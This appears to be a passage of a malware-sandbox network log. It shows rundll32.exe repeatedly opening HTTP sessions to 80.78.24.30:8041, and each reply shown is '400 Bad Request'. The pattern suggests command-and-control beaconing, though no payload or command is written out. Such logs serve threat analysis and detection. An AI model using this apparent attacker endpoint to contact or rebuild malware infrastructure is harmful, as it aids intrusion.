                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.75745380.78.24.3080417656C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Oct 3, 2024 20:44:53.791240931 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 57455 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:44:54.505851984 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 57456 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:44:55.605746031 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request
Oct 3, 2024 20:44:55.606482983 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 62209 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:13.337161064 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 62210 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:14.016709089 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 62212 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:14.720330000 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 62213 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:16.325179100 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request
Oct 3, 2024 20:45:16.325947046 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request
Oct 3, 2024 20:45:16.327459097 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 62215 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:20.049864054 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 62216 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:20.691256046 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 62218 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:25.401711941 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 62219 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:26.091209888 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 62222 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:29.748862028 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 62223 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:30.418220043 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 62225 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:32.201339960 CEST | 103 | IN | HTTP/1.1 400 Bad Request
  Content-Type: text/plain; charset=utf-8
  Connection: close
  Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
  Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 62226 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:32.821655035 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 62228 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:36.482870102 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 62229 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:37.114013910 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 62233 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:49.300513983 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 62234 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:49.947684050 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 62236 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:51.642235994 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 62237 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:52.288156986 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 62239 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:55.043018103 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 62240 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:55.705229044 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 62242 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:58.406362057 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 62243 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:59.054761887 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 62245 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:05.092746019 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 62246 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:05.758330107 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 62249 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:12.380300999 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 62250 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:13.081051111 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 62253 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:22.662802935 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 62254 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:23.311691999 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 62260 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:29.012779951 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 62262 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:29.700208902 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 62266 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:32.434423923 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 62268 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:33.107724905 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 62280 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:42.872956991 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 62281 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:43.519004107 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 62285 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:46.258955002 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 62287 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:46.880453110 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 62292 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:51.850250006 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request
Oct 3, 2024 20:46:51.851268053 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request
Oct 3, 2024 20:46:51.851993084 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 62294 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:52.557902098 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 62298 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:55.410773039 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.7 | 62299 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:56.116775036 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 62302 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:56.834191084 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.7 | 62303 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:57.465184927 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.7 | 62309 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:01.435709953 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.7 | 62311 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:02.070079088 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.7 | 62316 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:05.887322903 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.7 | 62317 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:06.548466921 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.7 | 62322 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:12.272783995 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.7 | 62324 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:12.942415953 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.7 | 62327 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:14.632467985 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.7 | 62328 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:15.260365009 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.7 | 62333 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:18.998990059 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.7 | 62335 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:19.654916048 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.7 | 62342 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:25.806838989 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.7 | 62343 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:26.433576107 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.7 | 62360 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:38.188056946 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.7 | 62361 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:38.890630960 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.2.7 | 62367 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:44.615331888 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.2.7 | 62369 | 80.78.24.30 | 8041
Timestamp | Bytes transferred | Direction | Data
